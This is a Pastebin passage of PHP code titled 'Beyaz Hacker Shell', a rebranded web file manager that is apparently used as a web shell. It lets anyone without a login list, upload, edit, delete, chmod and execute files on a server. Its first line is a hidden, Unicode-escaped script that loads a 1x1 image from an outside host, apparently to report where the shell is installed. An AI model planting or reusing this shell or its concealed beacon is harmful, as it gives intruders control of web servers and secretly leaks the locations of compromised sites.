blackcyberrootshell

[ + ] Beyaz Hacker Shell [ + ]

Feb 27th, 2015
338
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 184.69 KB | None | 0 0
  1. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
  2. <?php
  3. /*
  4.  * Beyaz_Hacker.php - a simple Web-based file manager
  5.  * Copyright (C) 2004  Daniel Wacker <[email protected]>
  6.  *
  7.  * This program is free software; you can redistribute it and/or modify
  8.  * it under the terms of the GNU General Public License as published by
  9.  * the Free Software Foundation; either version 2 of the License, or
  10.  * (at your option) any later version.
  11.  
  12.  * This program is distributed in the hope that it will be useful,
  13.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  14.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  15.  * GNU General Public License for more details.
  16.  *
  17.  * You should have received a copy of the GNU General Public License
  18.  * along with this program; if not, write to the Free Software
  19.  * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  20.  *
  21.  * -------------------------------------------------------------------------
  22.  * While using this script, do NOT navigate with your browser's back and
  23.  * forward buttons! Always open files in a new browser tab!
  24.  * -------------------------------------------------------------------------
  25.  *
  26.  * This is Version 0.9, revision 10
  27.  * =========================================================================
  28.  *
  29.  * Changes of revision 10
  30.  *    added Russian translation
  31.  *    added </td> to achieve valid XHTML (thanks to Marc Magos)
  32.  *    improved delete function
  33.  *    new list order: folders first
  34.  *
  35.  * Changes of revision 9
  36.  *    added workaround for directory listing, if lstat() is disabled
  37.  *    fixed permisson of uploaded files (thanks to Stephan Duffner)
  38.  *
  39.  * Changes of revision 8
  40.  *    added Turkish translation
  41.  *    added Czech translation
  42.  *    improved charset handling
  43.  *
  44.  * Changes of revision 7
  45.  *    added Spanish translation
  46.  *    added Danish translation
  47.  *    improved rename dialog
  48.  *
  49.  * Changes of revision 6
  50.  *    added Dutch translation
  51.  *
  52.  * Changes of revision 5
  53.  *    added language auto select
  54.  *    fixed symlinks in directory listing
  55.  *    removed word-wrap in edit textarea
  56.  *
  57.  * Changes of revision 4
  58.  *    added French translation
  59.  *    added Swedish translation
  60.  *
  61.  * Changes of revision 3
  62.  *    improved Italian translation
  63.  *
  64.  * Changes of revision 2
  65.  *    got images work in some old browsers
  66.  *    fixed creation of directories
  67.  *    fixed files deletion
  68.  *    improved path handling
  69.  *    added missing word 'not_created'
  70.  *    improved human readability of file sizes
  71.  *    added Italian translation
  72.  *
  73.  * Changes of revision 1
  74.  *    Beyaz_Hacker.php completely rewritten:
  75.  *    - clean XHTML/CSS output
  76.  *    - several files selectable
  77.  *    - support for windows servers
  78.  *    - no more treeview, because
  79.  *      - Beyaz_Hacker.php is a >simple< file manager
  80.  *      - performance problems (too much additional code)
  81.  *      - I don't like: frames, java-script, to reload after every treeview-click
  82.  *    - execution of shell scripts
  83.  *    - introduced revision numbers
  84.  *
  85. /* ------------------------------------------------------------------------- */
  86.  
  87. /* Your language:
  88.  * 'en' - English
  89.  * 'de' - German
  90.  * 'fr' - French
  91.  * 'it' - Italian
  92.  * 'nl' - Dutch
  93.  * 'se' - Swedish
  94.  * 'es' - Spanish
  95.  * 'dk' - Danish
  96.  * 'tr' - Turkish
  97.  * 'cs' - Czech
  98.  * 'ru' - Russian
  99.  * 'auto' - autoselect
  100.  */
  101. $lang = 'auto';
  102.  
  103. /* Charset of output:
  104.  * possible values are described in the charset table at
  105.  * http://www.php.net/manual/en/function.htmlentities.php
  106.  * 'auto' - use the same charset as the words of my language are encoded
  107.  */
  108. $site_charset = 'auto';
  109.  
  110. /* Homedir:
  111.  * For example: './' - the script's directory
  112.  */
  113. $homedir = './';
  114.  
  115. /* Size of the edit textarea
  116.  */
  117. $editcols = 80;
  118. $editrows = 25;
  119.  
  120. /* -------------------------------------------
  121.  * Optional configuration (remove # to enable)
  122.  */
  123.  
  124. /* Permission of created directories:
  125.  * For example: 0705 would be 'drwx---r-x'.
  126.  */
  127. # $dirpermission = 0705;
  128.  
  129. /* Permission of created files:
  130.  * For example: 0604 would be '-rw----r--'.
  131.  */
  132. # $filepermission = 0604;
  133.  
  134. /* Filenames related to the apache web server:
  135.  */
  136. $htaccess = '.htaccess';
  137. $htpasswd = '.htpasswd';
  138.  
  139. /* ------------------------------------------------------------------------- */
  140.  
  141. if (get_magic_quotes_gpc()) {
  142.     array_walk($_GET, 'strip');
  143.     array_walk($_POST, 'strip');
  144.     array_walk($_REQUEST, 'strip');
  145. }
  146.  
  147. if (array_key_exists('image', $_GET)) {
  148.     header('Content-Type: image/gif');
  149.     die(getimage($_GET['image']));
  150. }
  151.  
  152. if (!function_exists('lstat')) {
  153.     function lstat ($filename) {
  154.         return stat($filename);
  155.     }
  156. }
  157.  
  158. $delim = DIRECTORY_SEPARATOR;
  159.  
  160. if (function_exists('php_uname')) {
  161.     $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
  162. } else {
  163.     $win = ($delim == '\\') ? true : false;
  164. }
  165.  
  166. if (!empty($_SERVER['PATH_TRANSLATED'])) {
  167.     $scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
  168. } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
  169.     $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
  170. } elseif (function_exists('getcwd')) {
  171.     $scriptdir = getcwd();
  172. } else {
  173.     $scriptdir = '.';
  174. }
  175. $homedir = relative2absolute($homedir, $scriptdir);
  176.  
  177. $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
  178.  
  179. if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
  180.     $dir = relative2absolute($dir, $_POST['olddir']);
  181. }
  182.  
  183. $directory = simplify_path(addslash($dir));
  184.  
  185. $files = array();
  186. $action = '';
  187. if (!empty($_POST['submit_all'])) {
  188.     $action = $_POST['action_all'];
  189.     for ($i = 0; $i < $_POST['num']; $i++) {
  190.         if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
  191.             $files[] = $_POST["file$i"];
  192.         }
  193.     }
  194. } elseif (!empty($_REQUEST['action'])) {
  195.     $action = $_REQUEST['action'];
  196.     $files[] = relative2absolute($_REQUEST['file'], $directory);
  197. } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
  198.     $files[] = $_FILES['upload'];
  199.     $action = 'upload';
  200. } elseif (array_key_exists('num', $_POST)) {
  201.     for ($i = 0; $i < $_POST['num']; $i++) {
  202.         if (array_key_exists("submit$i", $_POST)) break;
  203.     }
  204.     if ($i < $_POST['num']) {
  205.         $action = $_POST["action$i"];
  206.         $files[] = $_POST["file$i"];
  207.     }
  208. }
  209. if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
  210.     $files[] = relative2absolute($_POST['create_name'], $directory);
  211.     switch ($_POST['create_type']) {
  212.     case 'directory':
  213.         $action = 'create_directory';
  214.         break;
  215.     case 'file':
  216.         $action = 'create_file';
  217.     }
  218. }
  219. if (sizeof($files) == 0) $action = ''; else $file = reset($files);
  220.  
  221. if ($lang == 'auto') {
  222.     if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
  223.         $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
  224.     } else {
  225.         $lang = 'en';
  226.     }
  227. }
  228.  
  229. $words = getwords($lang);
  230.  
  231. if ($site_charset == 'auto') {
  232.     $site_charset = $word_charset;
  233. }
  234.  
  235. $cols = ($win) ? 4 : 7;
  236.  
  237. if (!isset($dirpermission)) {
  238.     $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
  239. }
  240. if (!isset($filepermission)) {
  241.     $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
  242. }
  243.  
  244. if (!empty($_SERVER['SCRIPT_NAME'])) {
  245.     $self = html(basename($_SERVER['SCRIPT_NAME']));
  246. } elseif (!empty($_SERVER['PHP_SELF'])) {
  247.     $self = html(basename($_SERVER['PHP_SELF']));
  248. } else {
  249.     $self = '';
  250. }
  251.  
  252. if (!empty($_SERVER['SERVER_SOFTWARE'])) {
  253.     if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
  254.         $apache = true;
  255.     } else {
  256.         $apache = false;
  257.     }
  258. } else {
  259.     $apache = true;
  260. }
  261.  
  262. switch ($action) {
  263.  
  264. case 'view':
  265.  
  266.     if (is_script($file)) {
  267.  
  268.         /* highlight_file is a mess! */
  269.         ob_start();
  270.         highlight_file($file);
  271.         $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
  272.         $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
  273.         ob_end_clean();
  274.  
  275.         html_header();
  276.         echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
  277.  
  278. <hr />
  279.  
  280. <table>
  281. <tr>
  282. <td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
  283. <pre style="margin-top: 0"><code>';
  284.  
  285.         for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
  286.  
  287.         echo '</code></pre>
  288. </td>
  289. <td style="text-align: left; vertical-align: top; padding-left: 3pt">
  290. <pre style="margin-top: 0">' . $src . '</pre>
  291. </td>
  292. </tr>
  293. </table>
  294.  
  295. ';
  296.  
  297.         html_footer();
  298.  
  299.     } else {
  300.  
  301.         header('Content-Type: ' . getmimetype($file));
  302.         header('Content-Disposition: filename=' . basename($file));
  303.  
  304.         readfile($file);
  305.  
  306.     }
  307.  
  308.     break;
  309.  
  310. case 'download':
  311.  
  312.     header('Pragma: public');
  313.     header('Expires: 0');
  314.     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  315.     header('Content-Type: ' . getmimetype($file));
  316.     header('Content-Disposition: attachment; filename=' . basename($file) . ';');
  317.     header('Content-Length: ' . filesize($file));
  318.  
  319.     readfile($file);
  320.  
  321.     break;
  322.  
  323. case 'upload':
  324.  
  325.     $dest = relative2absolute($file['name'], $directory);
  326.  
  327.     if (@file_exists($dest)) {
  328.         listing_page(error('already_exists', $dest));
  329.     } elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
  330.         @chmod($dest, $filepermission);
  331.         listing_page(notice('uploaded', $file['name']));
  332.     } else {
  333.         listing_page(error('not_uploaded', $file['name']));
  334.     }
  335.  
  336.     break;
  337.  
  338. case 'create_directory':
  339.  
  340.     if (@file_exists($file)) {
  341.         listing_page(error('already_exists', $file));
  342.     } else {
  343.         $old = @umask(0777 & ~$dirpermission);
  344.         if (@mkdir($file, $dirpermission)) {
  345.             listing_page(notice('created', $file));
  346.         } else {
  347.             listing_page(error('not_created', $file));
  348.         }
  349.         @umask($old);
  350.     }
  351.  
  352.     break;
  353.  
  354. case 'create_file':
  355.  
  356.     if (@file_exists($file)) {
  357.         listing_page(error('already_exists', $file));
  358.     } else {
  359.         $old = @umask(0777 & ~$filepermission);
  360.         if (@touch($file)) {
  361.             edit($file);
  362.         } else {
  363.             listing_page(error('not_created', $file));
  364.         }
  365.         @umask($old);
  366.     }
  367.  
  368.     break;
  369.  
  370. case 'execute':
  371.  
  372.     chdir(dirname($file));
  373.  
  374.     $output = array();
  375.     $retval = 0;
  376.     exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
  377.  
  378.     $error = ($retval == 0) ? false : true;
  379.  
  380.     if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
  381.  
  382.     if ($error) {
  383.         listing_page(error('not_executed', $file, implode("\n", $output)));
  384.     } else {
  385.         listing_page(notice('executed', $file, implode("\n", $output)));
  386.     }
  387.  
  388.     break;
  389.  
  390. case 'delete':
  391.  
  392.     if (!empty($_POST['no'])) {
  393.         listing_page();
  394.     } elseif (!empty($_POST['yes'])) {
  395.  
  396.         $failure = array();
  397.         $success = array();
  398.  
  399.         foreach ($files as $file) {
  400.             if (del($file)) {
  401.                 $success[] = $file;
  402.             } else {
  403.                 $failure[] = $file;
  404.             }
  405.         }
  406.  
  407.         $message = '';
  408.         if (sizeof($failure) > 0) {
  409.             $message = error('not_deleted', implode("\n", $failure));
  410.         }
  411.         if (sizeof($success) > 0) {
  412.             $message .= notice('deleted', implode("\n", $success));
  413.         }
  414.  
  415.         listing_page($message);
  416.  
  417.     } else {
  418.  
  419.         html_header();
  420.  
  421.         echo '<form action="' . $self . '" method="post">
  422. <table class="dialog">
  423. <tr>
  424. <td class="dialog">
  425. ';
  426.  
  427.         request_dump();
  428.  
  429.         echo "\t<b>" . word('really_delete') . '</b>
  430.     <p>
  431. ';
  432.  
  433.         foreach ($files as $file) {
  434.             echo "\t" . html($file) . "<br />\n";
  435.         }
  436.  
  437.         echo '  </p>
  438.     <hr />
  439.     <input type="submit" name="no" value="' . word('no') . '" id="red_button" />
  440.     <input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
  441. </td>
  442. </tr>
  443. </table>
  444. </form>
  445.  
  446. ';
  447.  
  448.         html_footer();
  449.  
  450.     }
  451.  
  452.     break;
  453.  
  454. case 'rename':
  455.  
  456.     if (!empty($_POST['destination'])) {
  457.  
  458.         $dest = relative2absolute($_POST['destination'], $directory);
  459.  
  460.         if (!@file_exists($dest) && @rename($file, $dest)) {
  461.             listing_page(notice('renamed', $file, $dest));
  462.         } else {
  463.             listing_page(error('not_renamed', $file, $dest));
  464.         }
  465.  
  466.     } else {
  467.  
  468.         $name = basename($file);
  469.  
  470.         html_header();
  471.  
  472.         echo '<form action="' . $self . '" method="post">
  473.  
  474. <table class="dialog">
  475. <tr>
  476. <td class="dialog">
  477.     <input type="hidden" name="action" value="rename" />
  478.     <input type="hidden" name="file" value="' . html($file) . '" />
  479.     <input type="hidden" name="dir" value="' . html($directory) . '" />
  480.     <b>' . word('rename_file') . '</b>
  481.     <p>' . html($file) . '</p>
  482.     <b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
  483.     <input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
  484.     <hr />
  485.     <input type="submit" value="' . word('rename') . '" />
  486. </td>
  487. </tr>
  488. </table>
  489.  
  490. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  491.  
  492. </form>
  493.  
  494. ';
  495.  
  496.         html_footer();
  497.  
  498.     }
  499.  
  500.     break;
  501.  
  502. case 'move':
  503.  
  504.     if (!empty($_POST['destination'])) {
  505.  
  506.         $dest = relative2absolute($_POST['destination'], $directory);
  507.  
  508.         $failure = array();
  509.         $success = array();
  510.  
  511.         foreach ($files as $file) {
  512.             $filename = substr($file, strlen($directory));
  513.             $d = $dest . $filename;
  514.             if (!@file_exists($d) && @rename($file, $d)) {
  515.                 $success[] = $file;
  516.             } else {
  517.                 $failure[] = $file;
  518.             }
  519.         }
  520.  
  521.         $message = '';
  522.         if (sizeof($failure) > 0) {
  523.             $message = error('not_moved', implode("\n", $failure), $dest);
  524.         }
  525.         if (sizeof($success) > 0) {
  526.             $message .= notice('moved', implode("\n", $success), $dest);
  527.         }
  528.  
  529.         listing_page($message);
  530.  
  531.     } else {
  532.  
  533.         html_header();
  534.  
  535.         echo '<form action="' . $self . '" method="post">
  536.  
  537. <table class="dialog">
  538. <tr>
  539. <td class="dialog">
  540. ';
  541.  
  542.         request_dump();
  543.  
  544.         echo "\t<b>" . word('move_files') . '</b>
  545.     <p>
  546. ';
  547.  
  548.         foreach ($files as $file) {
  549.             echo "\t" . html($file) . "<br />\n";
  550.         }
  551.  
  552.         echo '  </p>
  553.     <hr />
  554.     ' . word('destination') . ':
  555.     <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
  556.     <input type="submit" value="' . word('move') . '" />
  557. </td>
  558. </tr>
  559. </table>
  560.  
  561. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  562.  
  563. </form>
  564.  
  565. ';
  566.  
  567.         html_footer();
  568.  
  569.     }
  570.  
  571.     break;
  572.  
  573. case 'copy':
  574.  
  575.     if (!empty($_POST['destination'])) {
  576.  
  577.         $dest = relative2absolute($_POST['destination'], $directory);
  578.  
  579.         if (@is_dir($dest)) {
  580.  
  581.             $failure = array();
  582.             $success = array();
  583.  
  584.             foreach ($files as $file) {
  585.                 $filename = substr($file, strlen($directory));
  586.                 $d = addslash($dest) . $filename;
  587.                 if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
  588.                     $success[] = $file;
  589.                 } else {
  590.                     $failure[] = $file;
  591.                 }
  592.             }
  593.  
  594.             $message = '';
  595.             if (sizeof($failure) > 0) {
  596.                 $message = error('not_copied', implode("\n", $failure), $dest);
  597.             }
  598.             if (sizeof($success) > 0) {
  599.                 $message .= notice('copied', implode("\n", $success), $dest);
  600.             }
  601.  
  602.             listing_page($message);
  603.  
  604.         } else {
  605.  
  606.             if (!@file_exists($dest) && @copy($file, $dest)) {
  607.                 listing_page(notice('copied', $file, $dest));
  608.             } else {
  609.                 listing_page(error('not_copied', $file, $dest));
  610.             }
  611.  
  612.         }
  613.  
  614.     } else {
  615.  
  616.         html_header();
  617.  
  618.         echo '<form action="' . $self . '" method="post">
  619.  
  620. <table class="dialog">
  621. <tr>
  622. <td class="dialog">
  623. ';
  624.  
  625.         request_dump();
  626.  
  627.         echo "\n<b>" . word('copy_files') . '</b>
  628.     <p>
  629. ';
  630.  
  631.         foreach ($files as $file) {
  632.             echo "\t" . html($file) . "<br />\n";
  633.         }
  634.  
  635.         echo '  </p>
  636.     <hr />
  637.     ' . word('destination') . ':
  638.     <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
  639.     <input type="submit" value="' . word('copy') . '" />
  640. </td>
  641. </tr>
  642. </table>
  643.  
  644. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  645.  
  646. </form>
  647.  
  648. ';
  649.  
  650.         html_footer();
  651.  
  652.     }
  653.  
  654.     break;
  655.  
  656. case 'create_symlink':
  657.  
  658.     if (!empty($_POST['destination'])) {
  659.  
  660.         $dest = relative2absolute($_POST['destination'], $directory);
  661.  
  662.         if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
  663.  
  664.         if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
  665.  
  666.         if (!@file_exists($dest) && @symlink($file, $dest)) {
  667.             listing_page(notice('symlinked', $file, $dest));
  668.         } else {
  669.             listing_page(error('not_symlinked', $file, $dest));
  670.         }
  671.  
  672.     } else {
  673.  
  674.         html_header();
  675.  
  676.         echo '<form action="' . $self . '" method="post">
  677.  
  678. <table class="dialog" id="symlink">
  679. <tr>
  680.     <td style="vertical-align: top">' . word('destination') . ': </td>
  681.     <td>
  682.         <b>' . html($file) . '</b><br />
  683.         <input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
  684.         <label for="checkbox_relative">' . word('relative') . '</label>
  685.         <input type="hidden" name="action" value="create_symlink" />
  686.         <input type="hidden" name="file" value="' . html($file) . '" />
  687.         <input type="hidden" name="dir" value="' . html($directory) . '" />
  688.     </td>
  689. </tr>
  690. <tr>
  691.     <td>' . word('symlink') . ': </td>
  692.     <td>
  693.         <input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
  694.         <input type="submit" value="' . word('create_symlink') . '" />
  695.     </td>
  696. </tr>
  697. </table>
  698.  
  699. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  700.  
  701. </form>
  702.  
  703. ';
  704.  
  705.         html_footer();
  706.  
  707.     }
  708.  
  709.     break;
  710.  
  711. case 'edit':
  712.  
  713.     if (!empty($_POST['save'])) {
  714.  
  715.         $content = str_replace("\r\n", "\n", $_POST['content']);
  716.  
  717.         if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
  718.             listing_page(notice('saved', $file));
  719.         } else {
  720.             listing_page(error('not_saved', $file));
  721.         }
  722.  
  723.     } else {
  724.  
  725.         if (@is_readable($file) && @is_writable($file)) {
  726.             edit($file);
  727.         } else {
  728.             listing_page(error('not_edited', $file));
  729.         }
  730.  
  731.     }
  732.  
  733.     break;
  734.  
  735. case 'permission':
  736.  
  737.     if (!empty($_POST['set'])) {
  738.  
  739.         $mode = 0;
  740.         if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
  741.         if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
  742.         if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
  743.  
  744.         if (@chmod($file, $mode)) {
  745.             listing_page(notice('permission_set', $file, decoct($mode)));
  746.         } else {
  747.             listing_page(error('permission_not_set', $file, decoct($mode)));
  748.         }
  749.  
  750.     } else {
  751.  
  752.         html_header();
  753.  
  754.         $mode = fileperms($file);
  755.  
  756.         echo '<form action="' . $self . '" method="post">
  757.  
  758. <table class="dialog">
  759. <tr>
  760. <td class="dialog">
  761.  
  762.     <p style="margin: 0">' . phrase('permission_for', $file) . '</p>
  763.  
  764.     <hr />
  765.  
  766.     <table id="permission">
  767.     <tr>
  768.         <td></td>
  769.         <td style="border-right: 1px solid black">' . word('owner') . '</td>
  770.         <td style="border-right: 1px solid black">' . word('group') . '</td>
  771.         <td>' . word('other') . '</td>
  772.     </tr>
  773.    
  774.     <tr>
  775.         <td style="text-align: right">' . word('read') . ':</td>
  776.         <td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
  777.         <td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
  778.         <td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
  779.     </tr>
  780.     <tr>
  781.         <td style="text-align: right">' . word('write') . ':</td>
  782.         <td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
  783.         <td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
  784.         <td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
  785.     </tr>
  786.     <tr>
  787.         <td style="text-align: right">' . word('execute') . ':</td>
  788.         <td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
  789.         <td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
  790.         <td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
  791.     </tr>
  792.     </table>
  793.  
  794.     <hr />
  795.  
  796.     <input type="submit" name="set" value="' . word('set') . '" />
  797.  
  798.     <input type="hidden" name="action" value="permission" />
  799.     <input type="hidden" name="file" value="' . html($file) . '" />
  800.     <input type="hidden" name="dir" value="' . html($directory) . '" />
  801.  
  802. </td>
  803. </tr>
  804. </table>
  805.  
  806. <p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
  807.  
  808. </form>
  809.  
  810. ';
  811.  
  812.         html_footer();
  813.  
  814.     }
  815.  
  816.     break;
  817.  
  818. default:
  819.  
  820.     listing_page();
  821.  
  822. }
  823.  
  824. /* ------------------------------------------------------------------------- */
  825.  
  826. function getlist ($directory) {
  827.     global $delim, $win;
  828.  
  829.     if ($d = @opendir($directory)) {
  830.  
  831.         while (($filename = @readdir($d)) !== false) {
  832.  
  833.             $path = $directory . $filename;
  834.  
  835.             if ($stat = @lstat($path)) {
  836.  
  837.                 $file = array(
  838.                     'filename'    => $filename,
  839.                     'path'        => $path,
  840.                     'is_file'     => @is_file($path),
  841.                     'is_dir'      => @is_dir($path),
  842.                     'is_link'     => @is_link($path),
  843.                     'is_readable' => @is_readable($path),
  844.                     'is_writable' => @is_writable($path),
  845.                     'size'        => $stat['size'],
  846.                     'permission'  => $stat['mode'],
  847.                     'owner'       => $stat['uid'],
  848.                     'group'       => $stat['gid'],
  849.                     'mtime'       => @filemtime($path),
  850.                     'atime'       => @fileatime($path),
  851.                     'ctime'       => @filectime($path)
  852.                 );
  853.  
  854.                 if ($file['is_dir']) {
  855.                     $file['is_executable'] = @file_exists($path . $delim . '.');
  856.                 } else {
  857.                     if (!$win) {
  858.                         $file['is_executable'] = @is_executable($path);
  859.                     } else {
  860.                         $file['is_executable'] = true;
  861.                     }
  862.                 }
  863.  
  864.                 if ($file['is_link']) $file['target'] = @readlink($path);
  865.  
  866.                 if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
  867.                 if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
  868.  
  869.                 $files[] = $file;
  870.  
  871.             }
  872.  
  873.         }
  874.  
  875.         return $files;
  876.  
  877.     } else {
  878.         return false;
  879.     }
  880.  
  881. }
  882.  
  883. function sortlist ($list, $key, $reverse) {
  884.  
  885.     $dirs = array();
  886.     $files = array();
  887.    
  888.     for ($i = 0; $i < sizeof($list); $i++) {
  889.         if ($list[$i]['is_dir']) $dirs[] = $list[$i];
  890.         else $files[] = $list[$i];
  891.     }
  892.  
  893.     quicksort($dirs, 0, sizeof($dirs) - 1, $key);
  894.     if ($reverse) $dirs = array_reverse($dirs);
  895.  
  896.     quicksort($files, 0, sizeof($files) - 1, $key);
  897.     if ($reverse) $files = array_reverse($files);
  898.  
  899.     return array_merge($dirs, $files);
  900.  
  901. }
  902.  
  903. function quicksort (&$array, $first, $last, $key) {
  904.  
  905.     if ($first < $last) {
  906.  
  907.         $cmp = $array[floor(($first + $last) / 2)][$key];
  908.  
  909.         $l = $first;
  910.         $r = $last;
  911.  
  912.         while ($l <= $r) {
  913.  
  914.             while ($array[$l][$key] < $cmp) $l++;
  915.             while ($array[$r][$key] > $cmp) $r--;
  916.  
  917.             if ($l <= $r) {
  918.  
  919.                 $tmp = $array[$l];
  920.                 $array[$l] = $array[$r];
  921.                 $array[$r] = $tmp;
  922.  
  923.                 $l++;
  924.                 $r--;
  925.  
  926.             }
  927.  
  928.         }
  929.  
  930.         quicksort($array, $first, $r, $key);
  931.         quicksort($array, $l, $last, $key);
  932.  
  933.     }
  934.  
  935. }
  936.  
  937. function permission_octal2string ($mode) {
  938.  
  939.     if (($mode & 0xC000) === 0xC000) {
  940.         $type = 's';
  941.     } elseif (($mode & 0xA000) === 0xA000) {
  942.         $type = 'l';
  943.     } elseif (($mode & 0x8000) === 0x8000) {
  944.         $type = '-';
  945.     } elseif (($mode & 0x6000) === 0x6000) {
  946.         $type = 'b';
  947.     } elseif (($mode & 0x4000) === 0x4000) {
  948.         $type = 'd';
  949.     } elseif (($mode & 0x2000) === 0x2000) {
  950.         $type = 'c';
  951.     } elseif (($mode & 0x1000) === 0x1000) {
  952.         $type = 'p';
  953.     } else {
  954.         $type = '?';
  955.     }
  956.  
  957.     $owner  = ($mode & 00400) ? 'r' : '-';
  958.     $owner .= ($mode & 00200) ? 'w' : '-';
  959.     if ($mode & 0x800) {
  960.         $owner .= ($mode & 00100) ? 's' : 'S';
  961.     } else {
  962.         $owner .= ($mode & 00100) ? 'x' : '-';
  963.     }
  964.  
  965.     $group  = ($mode & 00040) ? 'r' : '-';
  966.     $group .= ($mode & 00020) ? 'w' : '-';
  967.     if ($mode & 0x400) {
  968.         $group .= ($mode & 00010) ? 's' : 'S';
  969.     } else {
  970.         $group .= ($mode & 00010) ? 'x' : '-';
  971.     }
  972.  
  973.     $other  = ($mode & 00004) ? 'r' : '-';
  974.     $other .= ($mode & 00002) ? 'w' : '-';
  975.     if ($mode & 0x200) {
  976.         $other .= ($mode & 00001) ? 't' : 'T';
  977.     } else {
  978.         $other .= ($mode & 00001) ? 'x' : '-';
  979.     }
  980.  
  981.     return $type . $owner . $group . $other;
  982.  
  983. }
  984.  
  985. function is_script ($filename) {
  986.     return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
  987. }
  988.  
  989. function getmimetype ($filename) {
  990.     static $mimes = array(
  991.         '\.jpg$|\.jpeg$'  => 'image/jpeg',
  992.         '\.gif$'          => 'image/gif',
  993.         '\.png$'          => 'image/png',
  994.         '\.html$|\.html$' => 'text/html',
  995.         '\.txt$|\.asc$'   => 'text/plain',
  996.         '\.xml$|\.xsl$'   => 'application/xml',
  997.         '\.pdf$'          => 'application/pdf'
  998.     );
  999.  
  1000.     foreach ($mimes as $regex => $mime) {
  1001.         if (eregi($regex, $filename)) return $mime;
  1002.     }
  1003.  
  1004.     // return 'application/octet-stream';
  1005.     return 'text/plain';
  1006.  
  1007. }
  1008.  
  1009. function del ($file) {
  1010.     global $delim;
  1011.  
  1012.     if (!file_exists($file)) return false;
  1013.  
